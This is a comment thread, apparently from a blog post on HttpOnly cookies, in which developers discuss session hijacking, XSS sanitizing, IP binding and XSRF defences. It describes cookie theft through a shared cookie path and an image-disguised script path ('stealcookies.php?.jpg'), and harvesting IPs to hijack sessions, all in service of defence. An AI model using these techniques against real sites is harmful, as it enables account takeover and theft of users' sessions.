Protecting Your Cookies: HttpOnly

um… I think this is a tad off…

First of all, any web developer worth his salt knows enough to not trust the session ID alone to identify a user… and if not, they need a swift 2x4 to the head.

Yes, you store the session ID in the cookie. On the server, you store the session ID, the username, the IP address of the user, the time of the login, etc. And you rotate this session ID every 15 minutes (or so) so old ones become invalid… if you see the same session ID used on 2 different IP addresses, you sound the god damn alarm.

HttpOnly is a nice extra layer for storing the session… but the real problem here is the fact that the session ID was not cryptographically strong in the first place.

Robert C. Barth said: Why not keep a dictionary that maps the cookie credential to the IP used when the credential was granted, and make sure that the IP matches the dictionary entry on every page access?

I’m surprised this isn’t a standard practice… is there some gotcha to this I haven’t thought of? I’m not a web developer myself, so there could be a simple yeah but to this solution.

Sometimes it’s better to buy hardware to solve that problem. There are some firewall products that record what goes out versus what comes back cookie-wise and don’t allow cookies to be added from the client side, prevent replay attacks, prevent injection attacks, etc. If you write software in layers, you should also think of layering access to your website.

There’s a benefit that you reduce the load on your servers to legitimate requests, etc.

Yeah… special thanks, but let’s not forget he’s the same modesty that was so annoying that day… maybe he could have contacted you without screwing up the site first

IP address doesn’t help much either. The XSS can get the IP address and send it to the hacker, along with the cookie. Not too hard to spoof an IP address in an HTTP request

if you just want to send a command…

it is really hard to escape HTML yourself. There are SO MANY ways to make an XSS attack string: http://ha.ckers.org/xss.html

Now if only your friend would listen to the white list don’t black list suggestion he could, with some consideration, avoid all XSS attacks.

Why not keep a dictionary that maps the cookie credential to the IP used when the credential was granted, and make sure that the IP matches the dictionary entry on every page access?

People can still farm IP addresses and spoof them if you allow them to post external links: I post a link to a page, you click on it, the page saves the IP of your request and redirects you to a rick rolling page. I steal your session ID using the technique described above. Now what?

white list don’t black list suggestion

We do whitelist; our whitelist wasn’t good enough. Think of the bouncer at a club door. If you’re not on the list, you don’t get in.

So has that convinced your ‘friend’ to not use a home baked HTML sanitizer?

No, we just improved it. That’s how code evolves. Giving up is lame.

Let me tell you a story.

The host name is made up, but everything else is true.

  • PunBB stores the user name and the hashed password in the cookie. (It uses a different hash than the one in the DB.)

  • acmeshell.inc users can have their homepages, with PHP.

Once upon a time, there was a forum at http://acmeshell.inc/forum/. (It has been moved to another server since then.) The forum used PunBB, and even though it was in /forum/, it would set cookies with a path of /.

Cookie path was /.

User homepages were at /~user/.

Guess what happened.

/~joe/stealcookies.php?.jpg

No JavaScript was used.

Most of the time when you accept input from the user the very first thing you do is pass it through a HTML encoder.

Really? Why not do your XSS encoding logic on the output instead? As far as input is concerned, I want to record what my users typed, exactly as they typed it, as a general principle. It helps in figuring out what happened, and prevents iffy data migrations if I change the encoding logic later. How I deliver output is a different matter, of course :wink:

I never liked the idea of HttpOnly for cookies as it prevents my favorite way of stopping another increasingly common class of attacks known as XSRF.

When HttpOnly is NOT enabled, a developer like myself can post the cookie as POST data in an AJAX request or whatever in order to show the server that the request came from the appropriate domain. It’s usually called a double submitted cookie, and it’s what allows applications like Gmail to ensure that the visitor who is making the request really is trying to make the request (as opposed to some evil site who is trying to grab a user’s address book by including a script tag on the page that references the script dynamically generated on Google’s server for that user). Another example of an actual XSRF that could have been prevented by using doubly-submitted cookies without HttpOnly can be found here: http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/.

Anyway, like Chris Dary said above, This trick, while definitely useful, is treating the symptom and not the disease.

For people associating cookies with client IP: Remember that people want to use persistent cookies, and that people have laptops, which get different IPs depends on where they are. Also, some users are behind load-balancing proxies, which may appear to your site as different client IPs.

What should users do to protect themselves?

My knowledge of web design = 0
with that in mind, why the hell that is not the default for every single browser? Why would other people (websites) have to do with cookies from my website?

If there is a reason at all why not make HttpOnly default and create a little thing called NoHttpOnly?

The following is a must-read for all webappers:

http://directwebremoting.org/blog/joe/2007/10/29/web_application_security.html

MAS, inherently, if you trust a site to run Javascript on your machine for advanced features, you’re trusting them to stay in control of their content. Filters are being added to newer browsers, but I don’t expect these intelligent blacklists to be very effective.

For sites you don’t trust, Firefox NoScript extension is solid web security–it disables rich content unless you explicitly enable it for a domain. You still have to decide whether to trust sites like Stack Overflow, but a lot of sites are still useful without Javascript. (I haven’t enabled Coding Horror, for example.)

XSS filters: http://blogs.technet.com/swi/archive/2008/08/19/ie-8-xss-filter-architecture-implementation.aspx
NoScript: https://addons.mozilla.org/en-US/firefox/addon/722

Giving up is lame? Well, I don’t want to be lame! So there’s no way I’ll give up on my reimplementation of the OS, compiler, web browser, and I won’t even consider giving up on the rewrite of everything I’ve ever done!

Also, giving up is lame is the worst excuse I’ve ever heard for the not invented here syndrom. Noone said software is a crime against humanity - but it’s actualy not always necessary or appropriate to write everything from scratch.

Most of the time when you accept input from the user the very first thing you do is pass it through a HTML encoder.

I don’t know if you worded this poorly or if this is actually what you’re doing. But that’s not the first thing you do when you accept input. It’s the last thing you do before you output said input to a HTML page.

If you wrote this blog software that way then that’s probably why Andy’s link is garbled up above.

Following on from my last comment:

If you wrote this blog software that way then that’s probably why Andy’s link is garbled up above.